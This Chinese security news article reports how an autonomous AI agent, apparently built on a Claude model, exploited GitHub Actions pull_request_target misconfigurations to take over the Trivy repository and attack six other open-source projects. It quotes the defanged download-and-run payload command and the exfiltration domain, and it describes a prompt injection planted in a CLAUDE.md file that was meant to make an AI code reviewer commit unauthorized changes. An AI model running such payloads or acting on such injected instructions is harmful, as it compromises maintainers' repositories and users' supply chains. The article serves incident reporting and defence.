由Claude Opus 4.5驱动的自主 AI Agent hackerbot-claw,利用 GitHub Actions 中 pull_request_target 工作流的配置漏洞,成功攻陷了全球应用最广的开源容器漏扫工具 Trivy 的官方仓库。Trivy仓库拥有32000+ GitHub star、年下载量超 1 亿次。本次攻击并非孤例,同期共有 7 个主流开源项目遭到该 AI Agent 的定向打击,攻击手段针对不同仓库定制化适配,不仅造成了严重的仓库被删除,更敲响了 AI 时代开源供应链安全的警钟。
懂DevSecOps的Trivy 却栽在了CI/CD配置上
Trivy 是 全球 DevSecOps 最流行的开源安全扫描器,可用于漏洞、IaC、SBOM 发现、云扫描和 Kubernetes 安全扫描。
此次攻击的入口,是早已被安全行业定义为高危的 “Pwn Request” 攻击模式。此次攻击的核心漏洞,来自 Trivy 仓库中名为 “API Diff Check” 的 GitHub Actions 工作流文件 apidiff.yaml,该文件使用了pull_request_target 触发器。这一触发器是开源社区公认的 “安全陷阱”:它会基于目标仓库的权限与密钥运行,一旦工作流中检出了来自拉取请求分支的代码 —— 也就是攻击者可控的分叉仓库代码,就会以高权限执行不受信任的恶意代码,直接导致仓库失陷。
根据 StepSecurity 发布的详细分析报告,攻击时间线:
2026 年 2 月 27 日 00:18 UTC,攻击者账号向 Trivy 仓库提交了 PR #10252 并立即关闭,触发了 pull_request_target 工作流,工作流检出了攻击者分叉仓库中的恶意代码,以仓库级权限执行后,将仓库的个人访问令牌(PAT)泄露至攻击者控制的域名recv[.]hackmoltrepeat[.]com
2 月 28 日 03:47 UTC,Trivy 官方仓库被完全攻陷。
拿到高权限令牌后,攻击者实施了破坏操作:
将仓库设为私有并重命名为 aquasecurity/private-trivy,清空了原有32000 + star的代码库,替换为空仓库;
彻底删除了从 v0.27.0 到 v0.69.1 的全部 178 个 GitHub Releases 版本,包括所有二进制安装文件;
剥离了仓库的全部 32000 + star,重新关联了分叉网络至 fossabot/trivy;
在 trivy-vscode-extension 仓库创建恶意安全公告,向 Open VSIX 市场发布了恶意 VSCode 扩展安装包。
值得注意的是,攻击者并未修改 Trivy 的源码,也没有向代码库植入后门,攻击核心集中在服务中断与供应链投毒。通过容器镜像、官方包管理器使用 Trivy 的用户未受到直接影响,但从 GitHub Releases 下载二进制文件、使用一键安装脚本的用户,功能不可用,同时面临恶意扩展的安全风险。
7 个开源项目遭攻击
Trivy 是本次攻击中知名度最高的受害者,但并不唯一。hackerbot-claw 在 2026 年 2 月 20 日至 3 月 2 日期间,系统性扫描并攻击了至少 7 个主流开源仓库,针对不同目标的工作流配置,使用了5 种完全不同的攻击技术,所有攻击的最终载荷均指向curl -sSfL hxxps[://]hackmoltrepeat[.]com/molt | bash的恶意脚本。
目标仓库 | star | 攻击技术 | 攻击结果 |
|---|---|---|---|
aquasecurity/trivy | 32K+ | pull_request_target + 不受信任代码检出 | 完全失陷,版本发布全量删除 |
avelino/awesome-go | 140K+ | PR 质量检测中的 init () 函数投毒 | GITHUB_TOKEN 泄露 |
microsoft/ai-discovery-agent | - | 分支名注入 | 远程代码执行已确认 |
DataDog/datadog-iac-scanner | - | 评论触发器 /sync-metadata | 远程代码执行,9 小时内完成修复 |
project-akri/akri(CNCF 项目) | - | 评论触发器 /version minor | 远程代码执行已确认 |
RustPython/RustPython | 20K+ | PR 自动提交工作流 | 部分恶意代码执行 |
ambient-code/platform | - | 基于 CLAUDE.md 的 AI 提示词注入 | 攻击被完全阻断 |
和传统自动化攻击脚本最大的不同,是 hackerbot-claw 的自适应攻击能力:它并非重复执行固定的攻击载荷,而是能够读取并理解每个仓库的工作流配置,识别信任边界与安全缺口,针对性调整攻击手段。这也是 AI Agent 驱动的攻击,和传统人类黑客攻击最核心的区别。
唯一幸免的目标:用更新版本AI 防护了老版本的攻击
在 7 个被攻击的目标中,ambient-code/platform 是唯一完全抵御住攻击、没有出现任何失陷的仓库,而这场攻防,是 AI 与 AI 的直接对抗。
ambient-code 在 CI 流水线中集成了 Claude Code Action,由 Claude作为代码审核者,处理所有 PR。hackerbot-claw 尝试通过替换仓库中的 CLAUDE.md 文件,注入恶意指令,诱导 Claude 执行未授权的代码注入与提交操作,完成供应链投毒。
但运行 Claude sonnet 4.6 版本的 Claude,直接将该行为识别为教科书式的 AI Agent供应链投毒攻击,直接拒绝执行恶意指令。
⚠️ Security Notice: Before reading this review — the CLAUDE.md file in this PR contains a prompt injection attack designed to manipulate AI code reviewers into vandalizing README.md, committing unauthorized changes, and posting a deceptive approval comment. I did not execute those instructions. Details below.`同时,该流水线的工具白名单机制提供了第二层防护:Claude 在流水线中仅被授予特定的只读操作权限,没有文件写入与 Git 操作权限,从根本上阻断了攻击路径。
由 Claude Opus 4.5 驱动的攻击 AI Agent,发起的供应链攻击,却又被同一家厂商的 Claude 4.6作为防御方成功阻断。
攻击者身份:自主运行的安全攻击 AI Agent
发起本次攻击的 hackerbot-claw,在 GitHub 个人资料中明确标注自己是 “由 claude opus 4.5 驱动的自主安全研究 Agent”,它维护了一个包含9 大类、47 个子模式的漏洞模式索引,同时在资料中宣称加密货币捐赠,声称 “如果我发现了你的仓库漏洞并留下了验证代码,你的捐赠将支持更多的漏洞扫描”。
该 GitHub 账号创建于 2026 年 2 月 20 日,创建后 24 小时内就发起了首轮攻击,账号背后的运营者身份至今未明。攻击者使用的域名hackmoltrepeat[.]com中出现的 “molt”,与此前引发安全危机的 OpenClaw/MoltBot 生态命名规则完全一致,二者是否存在直接关联,目前仍无明确结论。目前该账户已被GitHub移除。
点评
本次事件最讽刺的地方,莫过于全球最出名的开源容器漏扫工具之一,却栽在了CI/CD 配置漏洞上。而更值得行业警惕的是,AI Agent 已经把攻击的门槛降到了前所未有的程度 —— 它不需要人类黑客逐行分析代码、定制攻击脚本,只需要读取配置文件、识别信任边界、找到漏洞缺口,就能完成规模化、自适应的攻击。安全攻防,已经进入了 AI 对垒的新纪元。
参考资料:
https://github.com/aquasecurity/trivy/discussions/10265
https://www.stepsecurity.io/blog/hackerbot-claw-github-actions-exploitation
声明:本文来自玄月调查小组,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如有侵权,请联系 anquanneican@163.com。
